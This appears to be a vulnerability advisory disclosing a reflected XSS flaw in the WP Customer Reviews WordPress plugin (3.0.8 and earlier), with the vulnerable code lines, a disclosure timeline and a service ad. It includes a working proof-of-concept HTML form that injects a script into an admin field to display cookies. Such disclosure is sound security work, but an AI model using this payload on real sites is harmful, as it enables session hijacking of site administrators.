06 Apr

Reflected Cross-Site Scripting (XSS) Vulnerability in WP Customer Reviews

We recently discovered the WP Customer Reviews plugin had a reflected cross-site scripting (XSS) vulnerability. In version 3.0.8, and some prior versions, the file/include/admin/wp-customer-reviews-3-admin.php was echoing the value of the Support Code input without escaping it. That occurred on line 1151:

echo "<br />Running: <strong>{$this->p->wpcr3_debug_code}</strong><br /><br />";

and 1153:

print "<br /><strong>{$this->p->wpcr3_debug_code} DONE!</strong><br />";

Proof Of Concept

The following proof of concept page will cause any available cookies to shown in alert box. Major web browsers other than Firefox provide XSS filtering so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<head>
</head>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=wpcr3_options&tab=tools" method="post">
<input type="hidden" name="wpcr3_debug_code" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="wpcr3_confirm" value="YES" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 4/4/2016 – Developer notified.
  • 4/5/2016 – Version 3.0.9 released, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if the knew about them as well as making sure that that needed security checks have been implemented in the plugin. If you order two reviews you will receive free lifetime subscription to our service.

Leave a Reply

Your email address will not be published. Required fields are marked *